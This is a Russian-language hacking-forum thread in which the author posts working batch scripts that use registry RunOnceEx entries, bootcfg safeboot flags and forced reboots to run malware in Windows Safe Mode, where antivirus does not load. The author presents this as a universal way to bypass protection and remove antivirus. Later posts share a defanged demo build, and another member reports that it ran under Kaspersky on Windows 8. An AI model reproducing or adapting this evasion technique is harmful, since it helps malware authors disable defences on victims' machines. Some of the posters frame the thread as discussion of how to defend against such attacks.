Запускаем вирус в безопасном режиме и актуально-ли это ?

Тема в разделе "СТАТЬИ И УРОКИ ПО ВЗЛОМУ И ОБХОДУ ЗАЩИТЫ", создана пользователем X-Shar, 11 дек 2013.

↑ ↓
  1. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.813
    Симпатии:
    433
    Пол:
    Мужской
    Репа:
    +969 / 153 / -29
    Jabber:
    Telegram:
    Всем привет, обычно такими делами не занимаюсь, но где-то на прошлой неделе что-то заморочился, а как можно обойти антивирус, да и вообще любую защиту, не знаю на хер мне это нужно, но что-то не смог сдержаться...

    Хотелось найти какой-либо универсальный способ, который-бы действовал на все средства защиты, ну или почти на все ! ;)

    Что в этоге получилось, а я подумал, почему-бы не запускать наш зловред в безопасном режиме, а почему-бы и нет, ведь в безопасном режиме не запускаются встроенные средства защиты винды, и самое главное ненавистные антивирусы ! :)

    Суть идеи вот в чём:

    Вирус при первом запуске перезапускает систему в безопасном режиме не выполняя при этом каких-либо опасных, либо подозрительных действий, далее уже в безопасном режиме делай, что хочешь ! ;)

    Думал я как это реализовать, пока нашёл решение при помощи батников, что я сделал, при первом запуске вирус создаёт батник и исполняет его, тем самым перезагружает систему в сейф мод., и от туда-уже запускает себя и делает что нужно...

    Ну думаю хватит филосовствовать, перейдём к делу, хочу привести код батника, который получился, в общем-то всё просто:
    Код:
    @ECHO OFF
    ECHO Rebooting into Safe Mode
    SET LMROEX=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx
    REG ADD %LMROEX% /V TITLE /D "LM-ROEX SafeMoe" /f
    REG ADD %LMROEX%\101 /vE /d "SafeMoe Installs" /f
    REG ADD %LMROEX%\101 /v 1 /d С:\StartVirus.bat /f
    bootcfg /raw /a /safeboot:minimal /id 1
    SHUTDOWN -r -f -t 01
    В моём случае, я запускал ещё и второй батник С:\StartVirus.bat, но вы можете сразу запускать свой вирус...

    Хочу привести код второго батника, который создавал мой вирус и расскажу для чего он нужен:
    Код:
    @ECHO OFF
    ECHO Safe Mode Installs
    Start C:\virus.exe
    ECHO Rebooting into Normal Mode
    bootcfg /raw /fastdetect /id 1
    SHUTDOWN -r -f -t 01
    Ну во первых это запуск уже вируса, код Start C:\virus.exe

    Ну а во вторых обратите внимание на код:

    Код:
    bootcfg /raw /fastdetect /id 1
    SHUTDOWN -r -f -t 0
    Это ни что иное, как восстановление нормальной загрузки винды ! ;)

    Все батники протестированы на хрюше и 100% работают, на 7-8 не проверял !

    В этоге можем реализовать такое в любой системе программирования, хоть плюсы, хоть делфи, хоть в чём ещё, т.к. батники это всего-лишь вспомогательный функцианалл, а вирус уже может делать, что угодно, вплоть до удаления антивирусов из системы !

    И ещё хочу добавить, вовсе не обязательно создавать батники, можно выполнять эти команды из оболочки вируса, в общем можете делать, как хотите, как скажет ваша фантазия ! ;)

    У меня всё, при желании можете развить эту тему ! ;)

    З.Ы. Выкладывал эту тему на одном хакерском ресурсе, где профессионально создают малваре, но что-то там сказали, что всё это херня и не актуально, хочется узнать мнение здесь, если есть знающие люди !
    Ведь в сейф моде можно реализовать функционалл удаления АВ !sm3888

    ДЛЯ ОЗНАКОМЛЕНИЯ И ОБСУЖДЕНИЯ !!!
     
    • Мне нравится Мне нравится x 4
  2. Антоха Администратор
    Антоха
    Ответить в чате

    Администрация

    Регистрация:
    26.12.2012
    Сообщения:
    3.188
    Симпатии:
    11.100
    Пол:
    Мужской
    Репа:
    +11.248 / 47 / -6
    Jabber:
    Skype:
    X-Shar, а дай мне его попробовать на "восьмёрке".Неужели раньше никому в голову не приходила такая мысль (о запуске через сейф мод)...думаю разработчики виндовс и антивирусов,должны были принять во внимание такую возможность проникновения вируса в систему.
    P.S.Честное пионерское,что буду использовать лишь в целях ознакомления.
     
    • Мне нравится Мне нравится x 3
  3. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.813
    Симпатии:
    433
    Пол:
    Мужской
    Репа:
    +969 / 153 / -29
    Jabber:
    Telegram:
    Сделаю проще, изменил свой вирус, убрав в нём всю деструктивную активность, сейчас вирус запускает блокнот и вордпат в сейвмоде и возвращает всё как было...

    Сделал это, т.к. этот сайт нужен не для написания малваре, а для их исследования, обсуждения и защиты от них ! ;)

    Выкладываю с исходником, писал на C++ Bulder 6, старьё конечно, но он у меня на компе установлен, ну и за сорцы особо не ругайте, хоть прога и простецкая, особо не напрягался, может можно-было сделать круче, я тоже пока учусь, исходник можете глянуть ! ;)

    Ну и обратите внимание на дизайн моей проге, уже дал заявку на патент:

    Безымянный12.

    Пароль:111

    ТЕСТИТЬ ТОЛЬКО НА ВИРТУАЛКЕ !!!
     

    Вложения:

    • Мне нравится Мне нравится x 4
  4. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.813
    Симпатии:
    433
    Пол:
    Мужской
    Репа:
    +969 / 153 / -29
    Jabber:
    Telegram:
    Запускать Project1.exe будут вопросы задавайте !
     
    • Мне нравится Мне нравится x 4
  5. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.813
    Симпатии:
    433
    Пол:
    Мужской
    Репа:
    +969 / 153 / -29
    Jabber:
    Telegram:
    И ещё на 7-ке работает, если залочится boot.ini, то указанные файлы запустятся после перезагрузки, даже до запуска некоторых АВ !like it

    Правда доктор лочит boot.ini это во первых, а во вторых потом найдёт вирус в процессах !Hi-H-88

    Ну и срабатывает проактивка, можете проверить свою проактивку ! ;)

    Лучше конечно на виртуалке !Отдыхай!!!
     
    • Мне нравится Мне нравится x 4
  6. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.813
    Симпатии:
    433
    Пол:
    Мужской
    Репа:
    +969 / 153 / -29
    Jabber:
    Telegram:
    ВАЖНО: чуть не забыл, при нажатии на кнопку, вирус автоматически ребутнит ПК, так-что осторожно и тестировать на виртуалке и грамотным и опытным пользователям !Dmeh-Smeh-Smeh!!!
     
    • Мне нравится Мне нравится x 4
  7. Антоха Администратор
    Антоха
    Ответить в чате

    Администрация

    Регистрация:
    26.12.2012
    Сообщения:
    3.188
    Симпатии:
    11.100
    Пол:
    Мужской
    Репа:
    +11.248 / 47 / -6
    Jabber:
    Skype:
    Попробовал на голой "восьмёрке",без сторонней защиты.Поначалу завозмущался смарт скрин,отключил его.При запуске не от администратора-выдаёт ошибку.При запуске от администратора-вирус благополучно внедряется:).Сча подумаю какой антивирь поставить покруче для эксперимента.
    З.Ы.Мля,это какой-то писец когда на виртуалке и на основной машине-"восьмёрки".В виртуалке нихера не включить отовсюду вылезает сцуко с основной))Поставлю Касперского и посмотрю,как ему понравиться творение X-Shar(a).
     
    • Мне нравится Мне нравится x 4
  8. Антоха Администратор
    Антоха
    Ответить в чате

    Администрация

    Регистрация:
    26.12.2012
    Сообщения:
    3.188
    Симпатии:
    11.100
    Пол:
    Мужской
    Репа:
    +11.248 / 47 / -6
    Jabber:
    Skype:
    Олег,это ты так прикалываешься над бедными форумчанами (мега-изящный троллинг)?Тут такие зубры программного кода собрались,что ой-ой-ой;)Сейчас все ошибки твои наружу вытащат.

    За дизайн отдельный респект.Все бы кодеры такими добрыми были,написал бяку и на ней кнопочку с предупреждением.А дизайн крутой...минималистический..в моде такой нынче.
     
    • Мне нравится Мне нравится x 4
  9. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.813
    Симпатии:
    433
    Пол:
    Мужской
    Репа:
    +969 / 153 / -29
    Jabber:
    Telegram:
    Ну и как ?

    Кто-нить тестил, проактивка всю малину портит, ну и УАК этот тоже кстати...My mind
     
    • Мне нравится Мне нравится x 3
  10. Антоха Администратор
    Антоха
    Ответить в чате

    Администрация

    Регистрация:
    26.12.2012
    Сообщения:
    3.188
    Симпатии:
    11.100
    Пол:
    Мужской
    Репа:
    +11.248 / 47 / -6
    Jabber:
    Skype:
    Каспер одобрил твоё творение.Молча разрешил запуск приложения из неизвестного источника с правами администратора.Он наверное видит отсутствие деструктивного кода.Вообщем всё работает на ура...теперь заместо блокнота и вордпада осталось водородную бомбу прикрутить и будет отличная машинка)))
     
    • Мне нравится Мне нравится x 3
Похожие темы:
  1. X-Shar
    Ответов:
    23
    Просмотров:
    5.725
  2. X-Shar
    Ответов:
    4
    Просмотров:
    2.562
  3. X-Shar
    Ответов:
    9
    Просмотров:
    4.192
  4. BLONDY HACKER
    Ответов:
    23
    Просмотров:
    5.718
  5. X-Shar
    Ответов:
    11
    Просмотров:
    3.311
Загрузка...

Поделиться этой страницей